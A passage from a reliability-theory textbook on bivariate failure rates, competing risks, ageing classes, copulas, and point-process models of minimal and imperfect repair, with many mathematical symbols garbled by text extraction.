u, v t 0 . O1 (u, v)O2 (u , v) E1 Then SD1D 2 E1E 2 (t1 , t 2 ) defines the bivariate survival function for random durations T1DE , T2DE with marginal survival functions S1D1 (t1 ) and S 2D 2 (t 2 ) , respectively. The proof of this theorem is rather technical and can be found in Finkelstein (2003d). Remark 3.5 The results of this section can be generalized to the multivariate case when n ! 2 (Finkelstein, 2004d). Similar to Equations (3.20), (3.22) and (3.23), S (t1 ,..., tn ) S (t1 ) ˜ ˜ ˜ S (t2 ) exp{ A(t1 ,..., tn )} , (3.31) where A(t1 ,..., tn ) ln S (t1 ,..., tn ) , S (t1 ) ˜ ˜ ˜ S (tn ) and S (ti ) S (0,...,0, ti ,0,...,0); i 1,2,..., n are the corresponding marginal survival functions. Assume that S (ti ) and A(t1 ,..., tn ) are absolutely continuous functions. Similar to the bivariate case, ½° ­° ti exp® Oi (u )du ¾ , °¿ °¯ 0 ³ S (ti ) t1 A(t1 ,..., tn ) tn ³ ³ ˜ ˜ ˜ M (u1 ,..., u n )du1 ˜ ˜ ˜ du n , 0 0 where M (u1 ,..., un ) is an n -variate function. It is convenient to use the following notation: t1 tn 0 0 ³ ³ t1 tn 0 0 ³ ³ H (t1 ,..., t n ) { O1 (u )du  ˜ ˜ ˜  On (u )du  ˜ ˜ ˜ M (u1 ,..., u n )du1 ˜ ˜ ˜ du n . Therefore, the following exponential representation can be considered the formal More on Exponential Representation 59 generalization of the bivariate case: S (t1 ,..., t n ) exp{ H (t1 ,..., t n )} . (3.32) The analogues of failure rates (3.17)–(3.19) can also be formally defined (Finkelstein, 2004d). For example, the failure rate of Basu (3.17) obviously turns into O (t1 ,.., t n ) f (t1 ,...t n ) S (t1 ,..., t n ) (1) n wn ln S (t1 ,..., t n ) , wt1 ˜ ˜ ˜ wt n where O (t1 ,..., tn )dt1 ˜ ˜ ˜ dtn  o(dt1 ˜ ˜ ˜ dtn ) can be interpreted as the probability of failure of all items in the intervals of time [t1 , t1  dt1 ),..., [tn , t2  dtn ) , respectively, on condition that they did not fail before. Using these failure rates, the function H (t1 ,..., t n ) can explicitly be obtained, although even for the case of n 3 , the corresponding expression is cumbersome and is not as convenient for analysis as Representation (3.21). 3.3 Competing Risks and Bivariate Ageing 3.3.1 Exponential Representation for Competing Risks In this section, we will use the approach of the previous section for discussing the corresponding bivariate competing risks problem in reliability interpretation: the failure of a series system of possibly dependent components occurs when the first component failure occurs. A detailed treatment of the competing risks theory can be found, e.g., in the books by David and Moeschberger (1978) and by Crowder (2001). As previously, consider the lifetimes of the components T1 , T2 with supports in [0, f) . Assume that they are described by the absolutely continuous univariate Fi (ti ), i 1,2 and bivariate F (t1 , t 2 ) distribution functions. It seems that everything is similar to the usual bivariate case, but there is one important distinction: now we cannot observe T1 and T2 . What we observe is the following random variable: T min{T1 , T2 } . (3.33) Therefore, these variables now have the following meaning: Ti = the hypothetical time to failure of the i th component in the absence of a failure of the j th component, i, j 1,2; i z j . We are interested in the survival of our series system in [0, t ) . The corresponding survival function is obtained by equating t1 t and t 2 t . In this way, it becomes a univariate function. Now we are ready to apply the reasoning of the previous section to the described setting. Adjusting Equations (3.20)–(3.25): ~ S (t ) { S (t , t ) where S1 (t ) S 2 (t ) exp{B (t )} , (3.34) 60 Failure Rate Modelling for Reliability and Risk B (t ) { A(t , t ) ln S (t , t ) S1 (t ) S 2 (t ) t t t 0 0 0 (3.35) ³ ³ M (u, v)dudv ³ I (u)du, ~ and S (t ) denotes the survival function of our series system. Therefore, (3.21) can be written as the following exponential representation: ~ S (t ) ­° t ½° ­° t ½° ­° t ½° exp® O1 (u )du ¾ exp® O2 (u )du ¾ exp® I (u )du ¾ . °¯ 0 °¿ °¯ 0 °¿ °¯ 0 °¿ ³ ³ ³ (3.36) The function I (t ) formally results after ‘transforming’ the double integral in (3.35). By differentiating B(t ) , the following relation between I (u ) and M (u , v) is obtained: t I (t ) ³ (M (u, t )  M (t , u ))du . (3.37) 0 This means that Equation (3.37) defines the univariate function I (t ) via the bivariate function M (u , v) . ~ ~ Denote the failure rate of our system by O (t )  ln c S (t ) . It follows from Equation (3.36) that ~ O (t ) O1 (t )  O2 (t )  I (t ) . (3.38) ~ When the components are independent, O (t ) O1 (t )  O2 (t ) . Thus, the function I (t ) can also be viewed as the corresponding measure of dependence. Remark 3.6 The marginal survival functions S i (t ), i 1,2 are often called the net survival functions. 3.3.2 Ageing in Competing Risks Setting In this section, we will consider a specific approach to describing the bivariate (multivariate) ageing for series systems based on the exponential representations (Finkelstein and Esaulova, 2005). Detailed information on the properties of different univariate and multivariate ageing classes and the related theory can be found, e.g., in Lai and Xie (2006). In Section 2.4.1, the simplest IFR (DFR) and DMRL (IMRL) classes of distributions were discussed. The formal definitions are as follows. Definition 3.1. The Cdf F (x) is said to be IFR (DFR) if the survival function of the remaining lifetime Tt defined by Equation (2.3), i.e., Ft ( x) Pr[Tt ! x] F (x  t) F (t ) More on Exponential Representation 61 is decreasing (increasing) in t  [0, f) for each x t 0 . Equivalently, it can be seen easily that F (x)  IFR (DFR) if and only if  log F ( x) is convex (concave). When F (x) is absolutely continuous and therefore the failure rate O (t ) exists, the increasing (decreasing) property of the failure rate obviously defines the IFR (DFR) classes. Definition 3.2. The Cdf F (x) is said to be DMRL (IMRL) if the MRL function f m(t ) ³ F (u )du t 0 is decreasing (increasing) in t . It was stated in Theorem 2.4 that an increasing (decreasing) failure rate always results in a decreasing (increasing) MRL function (but not vice versa). We consider an increasing failure rate and a decreasing MRL function as characteristics of positive ageing (or just ageing), whereas a decreasing failure rate and an increasing MRL function describe negative ageing. This useful terminology is due to Spizzichino (1992, 2001) (see also Shaked and Spizzichino, 2001 and Basan et al., 2002). It will be shown in Chapter 6 that mixtures of IFR distributions can decrease at least in some intervals of time. For example, it is a well-known fact (Barlow and Proschan, 1975) that mixtures of exponential distributions have a decreasing failure rate and therefore possess the negative ageing property. Consider a system of two components in series and let the initial age of the i th component be ti , i 1,2 . Therefore, the system starts operating with these initial ages. A natural generalization of Definition 3.1 to this case is the following (Brindley and Thomson, 1972). Definition 3.3. The Cdf F (t1 , t 2 ) is a bivariate IFR (DFR) distribution if S (t1  x, t 2  x) is decreasing (increasing) in t1 , t2 t 0 for x t 0 . S (t1 , t 2 ) (3.39) Thus, S (t1  x, t 2  x) / S (t1 , t 2 ) is the joint probability of surviving an additional x units of time given that the component i survived up to time (age) ti , i 1,2 . There are several other similar definitions in the literature, but this definition seems to be the most important (Lai and Xie, 2006) owing to its reliability interpretation. Before interpreting (3.39), we must define the following basic stochastic ordering: Definition 3.4. A random variable X with the Cdf FX (x) is said to be larger in (usual) stochastic order than a random variable Y with the Cdf FX (x) , x t 0 , if FX ( x) t FY ( x), x t 0 . (3.40) 62 Failure Rate Modelling for Reliability and Risk The conventional notation for this stochastic order is X t st Y . Stochastic ordering plays an important role in reliability, actuarial science and other disciplines. There are numerous types of stochastic ordering (see Shaked and Shanthikumar (2007) for an up-to-date mathematical treatment of the subject). We will use only several relevant stochastic orders to be defined in the appropriate parts of this text. In what follows, when we refer to “stochastic order”, it means the order defined by (3.40). In accordance with this definition and (3.39), the univariate lifetime of the series system under consideration decreases (increases) stochastically as the ages of the components increase. Similar to (3.39), the following definition generalizes the univariate MRL ageing of Definition 3.2. Definition 3.5. The Cdf F (t1 , t 2 ) is a bivariate DMRL (IMRL) distribution if f ³ S (t 1 m(t1 , t 2 )  u, t 2  u )du 0 S (t1 , t 2 ) is decreasing (increasing) in t1 , t2 t 0 . (3.41) As in the univariate case (Theorem 2.4), it follows from Definitions 3.3 and 3.5 that Bivariate IFR (DFR) Ÿ Bivariate DMRL (IMRL). Let our series system start operating at t 0 when both components are ‘new’. The corresponding distribution of the remaining lifetime is F (x  t) F (t ) S (t  x, t  x) , S (t , t ) (3.42) where the left-hand side describes this random variable in the univariate interpretation ( F (x) is the survival function of the system considered as a ‘black box’), whereas the right hand side is written in terms of the corresponding bivariate survival function for t1 t 2 t . Therefore, it describes the system’s dependence structure in the competing risks setting. Definition 3.6. (Finkelstein and Esaulova, 2005). A series system of two possibly dependent components is IFR (DFR) if (3.39) holds for equal ages t1 t2 t , i.e., S (t  x, t  x) is decreasing (increasing) in t for x t 0 . S (t , t ) (3.43) In this case, the corresponding Cdf F (t1 , t2 ) is called the bivariate weak IFR (DFR) distribution. More on Exponential Representation 63 This definition tells us that the remaining lifetime is stochastically decreasing (increasing) in t (in terms of Definition 3.4) and that the univariate failure rate of a system is increasing (decreasing). Definition 3.7. A series system of two possibly dependent components is DMRL (IMRL) if (3.41) holds for equal ages t1 t2 t , i.e., f ³ S (t  u, t  u)du 0 S (t , t ) is decreasing (increasing) in t . (3.44) In this case, the corresponding Cdf F (t1 , t 2 ) will be called the bivariate weak DMRL (IMRL) distribution. In what follows in this section, we will discuss ageing properties of the bivariate Cdf F (t , t ) . When the components are independent, the ageing properties of a system are defined by the ageing properties of the components, as the system’s failure rate is just the sum of the failure rates of the components. For the dependent case, however, the dependence structure can play an important role, and Equations (3.36) and (3.38) should be taken into account. One can assume, e.g., that both marginal distributions are IFR, whereas specific dependence could result in the negative ageing (DFR) of a system. ~ We are now interested in simple, sufficient conditions for O (t ) of our series system to be monotone, which means that the Cdf F (t1 , t2 ) , in this case, is the bivariate weak IFR (DFR) distribution. The proof of the following theorem is obvious. Theorem 3.3. Let F (t1 , t 2 ) be an absolutely continuous bivariate Cdf with exponential marginals and the function M (u , v) , defined by Equation (3.25), be decreasing (increasing) in each of its arguments. ~ Then, as follows from Equations (3.37) and (3.38), the failure rate O (t ) is increasing (decreasing), and therefore F (t1 , t 2 ) is the bivariate weak DFR (IFR) distribution. It is obvious that the IFR part of Theorem 3.3 holds for IFR marginal distributions as well. The next result is formulated in terms of copulas. A formal definition and numerous properties of copulas can be found, e.g., in Nelsen (2001). Copulas create a convenient way of representing multivariate distributions. In a way, they ‘separate’ marginal distributions from the dependence structure. It is more convenient for us to consider the survival copulas based on marginal survival functions. Copulas based on marginal distribution functions are absolutely similar (Nelsen, 2001). As we are dealing with the bivariate competing risks model, we will define the bivariate copula. The case n ! 2 is similar. Assume that the bivariate survival function can be represented as a function of S i (ti ), i 1,2 in the following way: S (t1 , t 2 ) C S ( S1 (t1 ), S 2 (t 2 )) , (3.45) 64 Failure Rate Modelling for Reliability and Risk where the survival copula CS (u, v) is a bivariate function in [0,1] u [0,1] . Note that such a function always exists when the inverse functions for S i (ti ), i 1,2 exist: S (t1 , t 2 ) S ( S11 (t1 ), S11 (t 2 )) C S ( S1 (t1 ), S 2 (t 2 )) . It can be shown (Schweizer and Sklar, 1983) that the copula CS (u, v) is a bivariate distribution with uniform [0,1] marginal distributions. When the lifetimes are independent, the following obvious relationship holds: S (t1 , t 2 ) S1 (t1 ) S 2 (t 2 ) œ C S (u, v) uv . Substituting different marginal distributions, we obtain different bivariate distributions with the same dependence structure. In many instances, copulas are very helpful in multivariate analysis. The following specific theorem gives an example of the preservation of the weak IFR (DFR) ageing property (the proof can be found in Finkelstein and Esaulova (2005)). Theorem 3.4. Let the Cdf F (t1 , t2 ) with identical exponential marginal distributions be the weak IFR (DFR) bivariate distribution. Then the bivariate Cdf with the same copula and with identical IFR (DFR) marginal distributions is also weak IFR (DFR). Example 3.8 Gumbel Bivariate Distribution This distribution was defined by Equation (3.26) of Example 3.5. As the marginal distributions are exponential and M (u, v) G  0 , it follows from Equations (3.37) and (3.38) that this bivariate distribution is weak IFR and that the corresponding univariate failure rate is a linearly increasing function, i.e., ~ O (t ) 2(1  G t ) . Example 3.9 Farlie–Gumbel–Morgenstern Distribution This distribution is defined as (Johnson and Kotz, 1975) F (t1 , t 2 ) F1 (t1 ) F2 (t 2 )(1  D (1  F1 (t1 ))(1  F2 (t 2 ))) , where 1 d D d 1 . The corresponding bivariate survival function is S (t1 , t 2 ) S1 (t1 ) S 2 (t 2 )(1  D (1  S1 (t1 ))(1  S 2 (t 2 ))) . In accordance with Equation (3.20), S (t1 , t 2 ) When t1 t2 simplified to S1 (t1 ) S 2 (t 2 ) exp{ln(1  D (1  S1 (t1 ))(1  S 2 (t 2 )))} . t (competing risks) and S1 (t ) ~ S (t ) { S (t , t ) S 2 (t ) S (t ) , this equation can be S 2 (t ) exp{ln(1  D (1  S (t )) 2 )} . More on Exponential Representation 65 Direct calculation (Finkelstein and Esaulova, 2005) gives ~ O c(t ) ( ln S (t , t ))cc O c(t )(1  DS (t )(1  S (t ))  D (1  S (t )) 2 (1  D (1  S (t )) 2 ) ~ ~ u 2 S 4 (t ) S 2 (t )  DO2 (t ) S (t )(1  2S (t )  D (1  S (t )) 2 )2 S 4 (t ) S 2 (t ). By analysing this function it can be seen that if S (t ) is IFR and D t 0 , the func~ tion O (t ) ultimately (for ~sufficiently large t ) increases, whereas for the DFR S (t ) and D d 0 , the function O (t ) ultimately decreases. Another specific case with exponential S1 (t ) and S 2 (t ) results in the following conclusion: if D t 0 and S1 (t )  S 2 (t ) d 1, then the corresponding bivariate Cdf is weak IFR. Example 3.10 Durling–Pareto Distribution This distribution is defined by the following survival function: S (t1 , t 2 ) (1  t1  t 2  kt1t 2 ) D , D ! 0, 0 d k d D  1 . For the competing risk setting: ~ S (t ) (1  2t  kt 2 ) D . The system’s failure rate and its derivative are given by ~ O (t ) 2D ~ 1  kt , O c(t ) 2 1  2t  kt 2D k  2  k 2t 2 , (1  2t  kt 2 ) 2 respectively. Thus, if D d 1 , this bivariate distribution is weak DFR, and if D ! 1 , it is ultimately weak DFR (increasing for t d k  2 / k and decreasing for t ! k  2 / k ). 3.4 Chapter Summary Exponential representation (2.5) defines the meaningful characterization of a lifetime univariate distribution via the corresponding failure rate. It turns out that this representation also holds when the covariates are ‘smooth’, whereas a strong dependence on covariates can result in non-absolutely continuous distributions. The failure rate does not exist in the latter case, although the corresponding conditional probability (risk) of failure in the infinitesimal interval of time can always be defined. As the failure rate is a conditional characteristic, the observed (or marginal) failure rate should be obtained as a conditional expectation with respect to the external random covariate on condition that the item survived to time t . Section 3.1.3 gives several meaningful examples of this conditioning. It turns out that the shape of the observed failure rate can differ dramatically from the shape of the baseline failure rate. This topic will be considered in more detail in Chapter 6. 66 Failure Rate Modelling for Reliability and Risk There could be different failure-rate-type functions in the multivariate case. We derive exponential representation (3.21) for a bivariate distribution that involves two types of failure rates. This representation is a convenient tool for analysing data with dependent durations. The corresponding generalization to the multivariate ( n ! 1 ) case is rather cumbersome and presents mostly a theoretical interest. When t1 t 2 t , the bivariate setting can be interpreted in terms of the corresponding competing risks problem. For this case, we defined the notion of bivariate weak IFR (DFR) ageing and considered several examples. 4 Point Processes and Minimal Repair 4.1 Introduction – Imperfect Repair As minimal repair (see Section 4.4 for a formal definition) is a special case of imperfect repair, this section is, in fact, an introduction to both Chapters 4 and 5, which are devoted to imperfect repair modelling. Whereas the current chapter focuses mostly on some basic properties of the simplest point processes and on a detailed discussion of minimal repair, the next chapter deals with more general models of imperfect repair. Performance of repairable systems is usually described by renewal processes or alternating renewal processes. This means that a repair action is considered to be perfect, i.e., returning the system to a state that is as good as new. In many instances, this assumption is reasonable and it is used in practice as an adequate model for describing the quality of repair. However, in general, perfect repairs do not exist in real life. Even a complete overhaul of a system by means of spare parts is not ideal, as the spare parts can age during storage. We will use the term imperfect repair for each repair that is not perfect and the terms minimal repair and general repair for some specific cases of imperfect repair to be defined later. Note that repair in degrading systems usually decreases the accumulated amount of corresponding wear or degradation. For the proper modelling of imperfect repair, it is reasonable to assume that the cycles, i.e., the times between successive instantaneous repairs, form a sequence of decreasing (in a suitable probabilistic sense) random variables. Denote by Fi (t ) the Cdf of the i th cycle duration, i = 1,2,... . All cycles of an ordinary renewal process (see Section 4.3.2 for a formal definition) are i.i.d. random variables with a common Cdf F (t ) . It is reasonable to assume that a process of imperfect repairs is defined by the durations of the cycles that are stochastically decreasing with i . Therefore, in accordance with Definition 3.4, F1 (t ) ≤ st F2 (t ) ≤ st F3 (t ) ≤ ... . Other types of stochastic ordering can also be used for this purpose. For example, one of the weakest stochastic orderings when the corresponding random vari- 68 Failure Rate Modelling for Reliability and Risk ables are ordered with respect to their means is definitely suitable for describing deterioration of a system with each repair. A large number of models have been suggested for modelling imperfect repair processes. Most of the models may be classified into two main groups: • • Models where the repair actions reduce the value of the failure rate prior to a failure; Models where the repair actions reduce the age of a system prior to a failure. An exhaustive survey of available imperfect repair (maintenance) models can be found in Wang and Pham (2006). We will present a detailed bibliography later when describing the corresponding models. To illustrate these informal definitions, assume that the failure rate of a repairable item λ (t ) is an increasing function. Therefore, it is suitable for modelling lifetimes of degrading objects. Most of the imperfect repair models assume this simplest class of underlying lifetime distributions. For simplicity, let λ (t ) = t . Consider first the ordinary renewal process (perfect repair). The graph of the corresponding realization of a random failure rate λt with renewal times S i , i = 1,2,... is presented in Figure 4.1. (t) S1 S2 t Figure 4.1. Realization of a random failure rate for the renewal process with linear λ (t ) As the repairable system is ‘new’ after each repair, its age is just the time elapsed since the last renewal. Assume now that each repair decreases this age by half. This assumption defines a specific case of an age reduction model. We also assume that after the age reduction the failure rate is parallel to the initial λ (t ) = t . Therefore, it is also the failure rate reduction model. This can be illustrated by the following graph: Point Processes and Minimal Repair 69 (t) S1 S2 t Figure 4.2. Realization of a random failure rate for the imperfect repair process with linear failure rate (t) S1 S2 t Figure 4.3. Geometric model with linear λ (t ) On the other hand, let each repair increase the entire failure rate function in the following way: the failure rate that corresponds to the random duration of the second cycle is 2λt , the third cycle is characterized by 2 2 λt , etc. Therefore, at each subsequent cycle, the failure rate is larger than at the previous one. The corresponding graph is given in Figure 4.3. 70 Failure Rate Modelling for Reliability and Risk These graphs give a simple illustration of some of the possible models of imperfect repair. A variety of more general models will be described and analysed in this and the next chapter. The age reduction and the failure rate reduction define the main approaches to imperfect repair modelling. Note that these are rather formal stochastic models, whereas repair in degrading systems is usually an operation of decreasing the accumulated wear or deterioration of some kind. When, e.g., this wear is decreased to an initial value, the system returns to the as good as new state. This means perfect repair; otherwise, imperfect repair is performed. Therefore, stochastic deterioration processes should be used for developing more adequate models of imperfect repair. As far as we know, not much has been done in this prospective direction. In Section 4.6, we consider some initial simplified models of this kind. Imperfect repair has been studied in numerous publications. In what follows, we will discuss or mention most of the relevant important papers in this field. However, except for the recent monograph by Wang and Pham (2006) devoted to a rather close subject of imperfect maintenance, there is no other reliability-oriented monograph that presents a systematic treatment of this topic. Short sections on imperfect repair can also be found in recent books by Nachlas (2005) and Rausand and Houland (2004). Wang and Pham (2006) consider many useful specific models, whereas we mostly focus on discussing approaches, methods and their interpretation. The forthcoming detailed discussion of the subject intends to fill (to some extent) the gap in the literature devoted to imperfect repair modelling. Note that, in accordance with our methodology, most of the imperfect repair models considered in this book are directly or indirectly exploit the notion of a stochastic failure rate (intensity process). Instants of repair in technical systems can be considered as points of the corresponding point process. Therefore, before addressing the subject of this chapter, we must briefly describe the main stochastic point processes that are essential for the presentation of this book. Definitions of the compound Poisson process and the gamma process will be given in Section 5.6. These jump (point) processes can also be used for imperfect repair modelling. The rest of this chapter will be devoted to the minimal repair models and some extensions, whereas Chapter 5 will deal with more general imperfect repair models. Note that minimal repair was the first imperfect repair model to be considered in the literature (Barlow and Hunter, 1960). 4.2 Characterization of Point Processes The randomly occurring time points (instantaneous events) can be described by a stochastic point process N (t ), t ≥ 0 with a state space {0,1,2,...} as a sequence of increasing random variables. For any s, t ≥ 0 with s < t , the increment N ( s, t ) ≡ N (t ) − N ( s ) is equal to the number of points that occur in [ s, t ) and N ( s ) ≤ N (t ) for s ≤ t . Assume that our process is orderly (or simple), which means that there are no multiple occurrences, i.e., the probability of the occurrence of more than one event in a small interval of length Δt is o(Δt ). Assuming the limits exist, the rate of this process λr (t ) is defined as Point Processes and Minimal Repair λr (t ) = lim Δt →0 = lim Δt → 0 71 Pr[ N (t , t + Δt ) = 1] Δt E[ N (t , t + Δt )] . Δt (4.1) We use a subscript r , which stands for “rate”, to avoid confusion with the notation for the ‘ordinary’ failure rate of an item λ (t ) . Thus, λr (t )dt can be interpreted as an approximate probability of an event occurrence in [t + dt ) . The mean number of events in [0, t ) is given by the cumulative rate t E[ N (0, t )] ≡ Λ r (t ) = ∫ λr (u )du . 0 The rate λr (t ) does not completely define the point process, and therefore a more detailed description should be used for this type of characterization. The heuristic definition of this stochastic process that is sufficient for our presentation (see Aven and Jensen, 1999; Anderson et al., 1993 for mathematical details) is as follows. Definition 4.1. An intensity process (stochastic intensity) λt , t ≥ 0 of an orderly point process N (t ), t ≥ 0 is defined as the following limit: Pr[ N (t , t + Δt ) = 1 | Η t ] Δt →0 Δt λt = lim = lim Δt →0 E[ N (t , t + Δt ) | H t ] , Δt (4.2) where Η t = {N ( s ) : 0 ≤ s < t} is an internal filtration (history) of the point process in [0, t ) , i.e., the set of all point events in [0, t ) . This definition can be written in a compact form via the following conditional expectation: λt dt = E[dN (t ) | Η t ] . (4.3) Note that, as the end point of the interval [0, t ) is not included in the history, the notation Η t − is also often used in the literature. Intensity process (stochastic intensity) completely defines (characterizes) the corresponding point process. We will consider several meaningful examples of λt , t ≥ 0 in Section 4.3, whereas some informal illustrations were already given in the previous section. We will mostly use the term intensity process in what follows. It is often more convenient in practical applications to interpret Definition 4.1 in terms of realizations of history. To distinguish it from the intensity process, we will call the corresponding notion a conditional intensity function (CIF). Definition 4.2. Similar to (4.2), a CIF of an orderly point process N (t ), t ≥ 0 is defined for each fixed t as 72 Failure Rate Modelling for Reliability and Risk Pr[ N (t , t + Δt ) = 1 | Η (t )] Δt E[ N (t , t + Δt ) | Η (t )] , = lim Δt →0 Δt λ (t | H (t )) = lim Δt →0 (4.4) where Η (t ) is a realization of Η t : the observed (known) history of a point process in [0, t ) , i.e., the set of all events that occurred before t . Note that the terms “intensity process” and “CIF” are often interchangeable in the literature (Cox and Isham, 1980; Pulchini, 2003). It follows from the foregoing considerations that the rate of the orderly point process λr (t ) can be viewed as the expectation of the intensity process λt , t ≥ 0 over the entire space of possible histories, i.e., λr (t ) = E[λt ] . In the next section, we will consider several meaningful examples of point processes. 4.3 Point Processes for Repairable Systems 4.3.1 Poisson Process The simplest point process is one where points occur ‘totally randomly’. The following definition is formulated in terms of conditional characteristics and is equivalent to the standard definitions of the Poisson process (Ross, 1996). Definition 4.3. The non-homogeneous Poisson process (NHPP) is an orderly point process such that its CIF and intensity process are equal to the rate, i.e., λt = λ (t | Η (t )) = λr (t ) . (4.5) The corresponding probabilities in general Definitions 4.1 and 4.2 do not depend on the history, and therefore the property of independent increments holds automatically for this process. When λr (t ) ≡ λr , the process is called the homogeneous Poisson process, or just the Poisson process. The number of events in any interval of length d is given by Pr[ N (d ) = n] = exp{−Λ r (d )} (Λ r (d )) n , n! (4.6) where Λ r (t ) is the cumulative rate defined in the previous section. The distribution of time since t = x up to the next event, in accordance with Equation (2.2), is Point Processes and Minimal Repair ⎧⎪ x+t ⎫⎪ F (t | x) = 1 − exp⎨− ∫ λr (u )du ⎬ . ⎪⎩ x ⎪⎭ 73 (4.7) Therefore, the time to the first event for a Poisson process that starts at t = 0 is described by the Cdf with the failure rate λr (t ) . Note that, although the NHPP N (t ), t ≥ 0 has independent increments, the times between successive events, as follows from (4.6), are not independent. Assume, e.g., that λr (t ) is an increasing function. In accordance with Definition 3.4 and Equation (4.7), the time to the next failure is stochastically decreasing in x , i.e., F (t | x1 ) ≥ F (t | x2 ), 0 ≤ x1 ≤ x2 . This property, similar to that in Section 4.1, can already be used for defining the simplest model of imperfect repair. Let the arrival times in the NHPP with rate λr (t ) be denoted by S i , i = 1,2,..., S 0 = 0 . The following property will be used in Section 4.3.5. Consider the timetransformed process with arrival times S i ~ ~ S 0 = 0, S i = Λ r ( S i ) ≡ λr (u )du . ∫ 0 ~ It can be shown (Ross, 1996) that the process ~ defined by S i is a homogeneous Poisson process with the rate equal to 1 , i.e., λr (t ) = 1 . 4.3.2 Renewal Process As the generalization of a renewal process is the main goal of these two chapters, we will consider this process in detail. In addition, we will often use most of the results of this section in what follows. Let { X i }i≥1 denote a sequence of i.i.d. lifetime random variables with common Cdf F (t ) . Therefore, X i , i ≥ 1 are the copies of some generic X . Let the waiting (arrival) times be defined as n S 0 = 0, S n = ∑ X i , 1 where X i can also be interpreted as the interarrival times or cycles, i.e., times between successive renewals. Obviously, this setting corresponds to perfect, instantaneous repair. Define the corresponding point process as ∞ N (t ) = sup{n : S n ≤ t} = ∑ I ( S n ≤ t ) , 1 where, as usual, the indicator is equal to 1 if S n ≤ t and is equal to 0 otherwise. 74 Failure Rate Modelling for Reliability and Risk Definition 4.4. The described counting process N (t ), t ≥ 0 and the point process S n , n = 0,1,2,... are both called renewal processes. The rate of the process defined by Equation (4.1) is called the renewal density function in this specific case. Denote this function by h(t ) . Similar to the general setting, the corresponding cumulative function defines the mean number of events (renewals) in [0, t ) , i.e., t H (t ) = E[ N (t ] = ∫ h(u )du . 0 The function H (t ) is called the renewal function and is the main object of study in renewal theory. This function also plays an important role in different applications, as, e.g., it defines the mean number of repairs or overhauls of equipment in [0, t ) . Applying the operation of expectation to N (t ) results in the following relationship for H (t ) : ∞ H (t ) = ∑ F ( n ) (t ) , (4.8) 1 where F ( n ) (t ) denotes the n -fold convolution of F (t ) with itself. Assume that F (t ) is absolutely continuous so that the density f (t ) exists. Denote by ∞ H ∗ ( s ) = ∫ exp{− st ) H (t )dt and 0 f ∗ ( s ) = ∫ exp{− st ) f (t )dt 0 the Laplace transforms of H (t ) and f (t ) , respectively. Applying the Laplace transform to both sides of (4.8) and using the fact that the Laplace transform of a convolution of two functions is the product of the Laplace transforms of these functions, we arrive at the following equation: H ∗ ( s) = f ∗ (s) 1 ∞ k ∗ f s ( ( )) = . ∑ s k =1 s (1 − f ∗ ( s )) (4.9) As the Laplace transform uniquely defines the corresponding distribution, (4.9) implies that the renewal function is uniquely defined by the underlying distribution F (t ) via the Laplace transform of its density. The functions H (t ) and h(t ) satisfy the following integral equations: t H (t ) = F (t ) + ∫ H (t − x) f ( x)dx , (4.10) 0 t h(t ) = f (t ) + ∫ h(t − x) f ( x)dx . (4.11) 0 These renewal equations can be formally proved using Equation (4.8) (Ross, 1996), but here we are more interested in the meaningful probabilistic reasoning Point Processes and Minimal Repair 75 that also leads to these equations. Let us prove Equation (4.10) by conditioning on the time of the first renewal, i.e., t H (t ) = ∫ E[ N (t ) | X 1 = x] f ( x)dx 0 t = ∫ [1 + H (t − x)] f ( x)dx 0 t = F (t ) + ∫ H (t − x) f ( x)dx . (4.12) 0 If the first renewal occurs at time x ≤ t , then the process simply restarts and the expected number of renewals after the first one in the interval ( x, t ] is H (t − x) . Note that Equation (4.9) can also be obtained by applying the Laplace transform to both parts of Equation (4.10). In a similar way, the equation t h(t ) = ∫ 0 d ( E[ N (t ) | X 1 = x]) f ( x)dx dt eventually results in (4.11). Denote, as usual, the failure rate of the underlying distribution F (t ) by λ (t ) . The intensity process, which corresponds to the renewal process, is λt = ∑ λ (t − S n ) I ( S n ≤ t < S n+1 ), t ≥ 0 , (4.13) n≥0 and the CIF for this case is defined by λ (t | Η (t )) = ∑ λ (t − si ) I ( si ≤ t < si +1 ), t ≥ 0 , (4.14) si 1 , in accordance with Definition 3.4, the cycles of this process are stochastically decreasing in n , i.e., F (a n t ) > F (a n−1t ) ⇒ X n+1 < st X n , t > 0, n = 1,2,... . Therefore, this process can already model an imperfect repair action when after each repair a system’s ‘quality’ is worse than at the previous cycle. When a < 1 , a system is improving with each repair, which is not often seen in practice. Let E[ X 1 ] = m, Var ( X 1 ) = σ 2 . It follows from (4.17) that m σ2 Var X , ( ) = . n a n−1 a 2 ( n−1) E[ X n ] = The density function and the failure rate are f n (t ) = a n−1 f (a n−1t ), λn (t ) = a n −1λ (a n−1t ), n = 1,2..., (4.18) where f (t ) and λ (t ) denote the density and the failure rate of the underlying distribution F (t ) , respectively. Therefore, for a > 1 , in contrast to a renewal process and to the case a < 1 , the sum of expectations is converging, i.e., ∞ ∑ E[ X 1 n ]= am 1 and for sufficiently large t can be non-finite (Lam, 1988a). However, it is always finite for 0 < a ≤ 1 and the series (4.22) is always converging in this case. Taking Equation (4.18) into account, it is easy to modify the intensity process (4.13) for the case of a geometric process, i.e., λt = ∑ a n λ (a n (t − S n )) I ( S n ≤ t < S n+1 ), t ≥ 0 . (4.23) n ≥0 The CIF (4.14) becomes λ (t | Η (t )) = ∑ a n λ (a n (t − si )) I ( si ≤ t < si +1 ), t ≥ 0 . (4.24) si 1 , the cycles of the modulated renewal process are stochastically decreasing. To show this simple fact, assume that a cycle had start at time t1 . This means that in s units of time the corresponding failure rate will be z (t1 + s )λ ( s ) . For another cycle with a starting calendar time t 2 , t 2 > t1 , the failure rate is z (t 2 + s )λ ( s ) . As the function z (t ) is increasing, ⎫⎪ ⎧⎪ t ⎫⎪ ⎧⎪ t exp⎨− ∫ z (t1 + s )λ ( s )⎬ ≥ exp⎨− ∫ z (t 2 + s )λ ( s )⎬, t ≥ 0 , ⎪⎭ ⎪⎩ 0 ⎪⎭ ⎪⎩ 0 80 Failure Rate Modelling for Reliability and Risk which, in accordance with Definition 3.4, states that the second cycle is stochastically smaller than the first one. Therefore, as the cycles are stochastically decreasing, similar to the previous case of a geometric process, the modulated renewal process can also be used for modelling imperfect repair. Remark 4.1 As z (t ) often models the external factors that, in the first place, influence not a repair mechanism as such, but the failure mechanism of items, the usage of this model for imperfect repair modelling is usually formal. This criticism can probably be applied to some extent to a geometric process as well. Another type of modulation for renewal processes can be defined via a trendrenewal process (TRP). It was suggested by Lindqvist (1999) and extensively studied in Lindqvist et al. (2003) and Lindqvist (2006). This process generalizes a well-known property of the NHPP, which was formulated in Section 4.3.1, i.e., the specific time transformation of the NHPP results in the homogeneous Poisson process. The formal definition is as follows. Definition 4.6. Let z (t ) be a non-negative function defined for t 